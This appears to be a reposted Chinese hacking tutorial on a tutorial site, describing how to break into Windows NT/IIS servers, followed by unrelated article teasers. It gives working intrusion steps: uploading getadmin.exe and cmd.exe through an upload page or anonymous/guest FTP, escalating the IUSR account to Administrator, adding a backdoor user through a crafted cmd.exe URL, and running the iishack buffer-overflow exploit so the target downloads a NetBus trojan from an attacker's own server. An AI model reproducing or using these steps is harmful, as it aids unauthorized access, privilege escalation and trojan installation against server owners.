入侵NTserver典型途径攻击基础

2016-01-29 16:04 1 1 收藏

入侵NTserver典型途径攻击基础,入侵NTserver典型途径攻击基础

【 tulaoshi.com - 网络基础知识 】

    1. 如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限;
  2. 用netcat和iishack可以获得Administrator;
  3. iusr_计算机名这个帐号有ftp上传、web执行等权限;
  4. 在web server上执行程序是入侵NT的关键;
  5. 要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。
  在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

  第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:
 http://www.xxx.com/scripts/uploadn.asp
  guest和iusr_ntsvr2这两个帐号都可以进这个asp页面。
  在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录,然后输入:
 http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
  大约十多秒后屏幕显示:
  CGI Error
  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
  下面可以add user:
 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20china%20news%20/add

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com)

  这样就创建了一个叫china用户,密码是news,然后:
 http://www.xxx.com/scripts/getadmin.exe?china
  第二个方法:用匿名ftp
  如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT
server,比如:www.xxx.com(示例名):
  c: ftp www.xxx.com
  Connected to www.xxx.com
  220 ntsvr2 Microsoft FTP Service (Version 3.0).
  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain
user组,这个帐号我们以后要用来获取Administrator的权限。
  User (www.xxx.com:(none)):anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password: 输入guest@ 或者guest
  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码,那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain
guest组,在这种情况下我们就可以进NT server的ftp了。
  进去以后,看看目录列表,试试cd /scripts或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握了。
  把winnt下的cmd.exe copy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:
 http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
  大约十多秒后屏幕显示:
  CGI Error
  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
  下面可以add user:
 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:
 http://www.xxx.com/cgi-bin/getadmin.exe?china
  或者
 http://www.xxx.com/scripts/tools/getadmin.exe?china
  你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改。如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录下。

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com)

  第三个方法:用netcat和iishack
  如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。

 
  IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序:
iishack.exe、ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web
server的目录下,比如你的web server是www.mysvr.com,而对方的IIS server是www.xxx.com,则:
  iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意:不要加“http://”字符!)
  上述命令输入后这时你应该可以看到:
  ------(IIS 4.0 remote buffer overflow exploit)-----------------
  (c) dark spyrit -- barns@eeye.com.
 http://www.eEye.com
  [usage: iishack 〈host〉 〈port〉 〈url〉]
  eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
  do not include http://' before host

来源:https://www.tulaoshi.com/n/20160129/1497280.html

延伸阅读
乙肝传染途径 如今社会中越来越多的人得乙肝,从而乙肝的患者被很多人所排斥,也使我们这些没有得这种病朋友,都不敢跟乙肝的病患者接触,就是会怕被他们传染!那么像这些病到底是通过什么途径从而达到传播给别人的呢?让图老师的图老师小编告诉你,一起来看看吧。 传播途径 1、母婴传播 母婴传播被医学...
霍乱传播途径 霍乱虽已被消灭,但有的国家还在流行,所以需要及时做好预防工作,预防霍乱,首先要了解霍乱的传播途径。 1、经水传播水 在传播霍乱时起主要作用。在卫生条件差的地方,江河、河渠、池塘、湖水、井水和港湾海水等极易受到污染。我国农村夏秋季人们有喝生水、用生水漱口、洗刷食具、浸泡蔬菜、水...
非典型肺炎是什么 在日常生活当中,感冒发烧常常会伴随着我们,但是如果感染成为了肺炎那将是一件很麻烦的事情。肺炎也分几种,其中有一种叫做非典型肺炎。那么非典型肺炎是什么呢? 传染性非典型肺炎为一种由冠状病毒(SARS-CoV)引起的急性呼吸道传染病,世界卫生组织(WHO)将其命名为严重急性呼吸综合征(Severe Acute Respiratory Syn...
标签: 体寒的症状
巧用这些事物 让寒气无法入侵 冬季如期而至了,北方也已经下起了大雪,冷空气接踵而来,大家一定也都感觉到凉意了吧。每当换季的时候,生病的人就会增多。像现在天气骤冷,如何驱寒,保持并不断给体内注入阳气,成了时下最应该关注的养生大事。 体寒的症状 如果您觉得一到秋冬季节就手脚冰冷、经常觉得累、没...
灰色轨迹:一个人气很不错的黑客技术站点,也是当年培育我成长得地方。一日,闲来无事便想测试一下php脚本的安全性。所以就看了看灰色轨迹的VBB论坛。 因为是由于灰色论坛启发的学习之路,所以偶得先看看灰色论坛用得是版本的vbb了―――vBulletin Forum 2.3.0。 恩,就是这个,立刻找到了原文件看起来。一来就打开看到了日历文...

经验教程

516

收藏

34
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部